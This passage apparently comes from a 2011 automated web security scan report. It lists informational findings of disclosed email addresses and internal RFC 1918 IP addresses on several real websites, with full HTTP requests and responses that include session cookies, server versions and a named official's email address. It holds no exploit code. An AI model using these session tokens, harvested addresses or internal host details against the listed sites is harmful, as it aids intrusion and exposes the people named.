Issue detail

The following email address was disclosed in the response:

Request

GET /ada/works/resourcesoverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.262. https://www.vermontjoblink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:07:34 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/404/404_qry.cfm
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

22.263. http://www.vsea.org/join-your-union  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /join-your-union

Issue detail

The following email addresses were disclosed in the response:

Request

GET /join-your-union HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/join-vsea
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:24 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:13:24 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Joi
...[SNIP]...
<a href="mailto:vseains@tds.net">vseains@tds.net</a>
...[SNIP]...
<a href="mailto:vsea@vsea.org">vsea@vsea.org</a>
...[SNIP]...
<a href="mailto:vsea@vsea.org">
...[SNIP]...

23. Private IP addresses disclosed  previous  next
There are 27 instances of this issue:


23.1. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Sun, 01-May-2011 12:20:09 GMT; path=/; domain=digg.com
Set-Cookie: d=812aa8e869f0d2e7c87704b3fa38f3583a3547de3e2f6866581f174175564be4; expires=Thu, 29-Apr-2021 22:27:49 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24701 10.2.129.157
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8171

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.129.157 Build: 221 - Tue Apr 26 11:18:43 PDT 2011">
...[SNIP]...

23.2. http://facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://facebook.com
Path:   /sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer.php HTTP/1.1
Host: facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer.php
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.4.123
Connection: close
Date: Sat, 30 Apr 2011 12:20:31 GMT
Content-Length: 0
Elapsed: 0.011


23.3. http://home.mcafee.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV9
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:54 GMT
Content-Length: 36523
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<script type="text/javascript"> var mboxServerIp = '10.40.96.109';</script>
...[SNIP]...

23.4. http://home.mcafee.com/AdviceCenter/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /AdviceCenter/Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /AdviceCenter/Default.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/AdviceCenter/Default.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fAdviceCenter%2fDefault.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:19:00 GMT
Content-Length: 92200
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<script type="text/javascript"> var mboxServerIp = '10.40.96.102';</script>
...[SNIP]...

23.5. http://home.mcafee.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Default.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV6
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:54 GMT
Content-Length: 36523
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<script type="text/javascript"> var mboxServerIp = '10.40.96.106';</script>
...[SNIP]...

23.6. http://home.mcafee.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /Default.aspx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Default.aspx?culture=ES-AR HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: s_vi=; path=/
Set-Cookie: s_nr=; path=/
Set-Cookie: s_cc=; path=/
Set-Cookie: CampaignId=; path=/
Set-Cookie: s_campaign=; path=/
Set-Cookie: SessionInfo=; path=/
Set-Cookie: s_sq=; path=/
Set-Cookie: CookieInformation=; path=/
Set-Cookie: lBounceURL=; path=/
Set-Cookie: s_ev8=; path=/
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lng=; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: langid=96; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=ES-AR; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=ES-AR; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
